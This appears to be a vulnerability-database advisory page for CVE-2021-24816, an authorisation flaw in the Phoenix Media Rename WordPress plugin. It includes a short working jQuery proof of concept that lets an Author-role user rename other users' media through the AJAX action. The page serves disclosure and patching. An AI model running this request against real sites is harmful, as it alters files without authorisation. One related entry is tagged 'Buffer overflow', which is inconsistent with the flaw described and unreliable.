Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitApple502jWPEX-ID:5F63D677-20F3-4FE0-BB90-048B6898E6CD
HistoryOct 06, 2021 - 12:00 a.m.

Phoenix Media Rename < 3.4.4 - Author Arbitrary Media File Renaming

2021-10-0600:00:00
apple502j
418
phoenix media rename
author
arbitrary file renaming
web developer console
exploit
wordpress security

EPSS

0.001

Percentile

24.8%

JSON

The plugin does not have capability checks in its phoenix_media_rename AJAX action, which could allow users with Author roles to rename any uploaded media files, including ones they do not own.

As an Author, go to the page to edit one of your own Media (ie /wp-admin/post.php?post=1993&action=edit, which contains the _mr_wp_nonce nonce) and run the below in the Web Developer console (564 being the ID of the media the edit, which does not belong to the Author)

jQuery.post(ajaxurl, {
action: 'phoenix_media_rename',
type: "",
_wpnonce: jQuery('#_mr_wp_nonce').attr('value'),
new_filename: "missingauthz",
post_id:564
})

Related

wpvulndb 1
patchstack 1
cvelist 1
nvd 1
cve 1
prion 1
cnvd 1
wpvulndb
wpvulndb
Phoenix Media Rename < 3.4.4 - Author Arbitrary Media File Renaming
2021-10-06 00:00:00
patchstack
patchstack
WordPress Phoenix Media Rename plugin <= 3.4.2 - Arbitrary Media File Renaming vulnerability
2021-10-06 00:00:00
cvelist
cvelist
CVE-2021-24816 Phoenix Media Rename < 3.4.4 - Author Arbitrary Media File Renaming
2021-11-08 17:35:26
nvd
nvd
CVE-2021-24816
2021-11-08 18:15:10
cve
cve
CVE-2021-24816
2021-11-08 18:15:10
prion
prion
Buffer overflow
2021-11-08 18:15:00
cnvd
cnvd
WordPress Plugin Access Control Error Vulnerability (CNVD-2021-101476)
2021-11-10 00:00:00

EPSS

0.001

Percentile

24.8%

JSON
Related for WPEX-ID:5F63D677-20F3-4FE0-BB90-048B6898E6CD
wpvulndb1patchstack1cvelist1nvd1cve1prion1cnvd1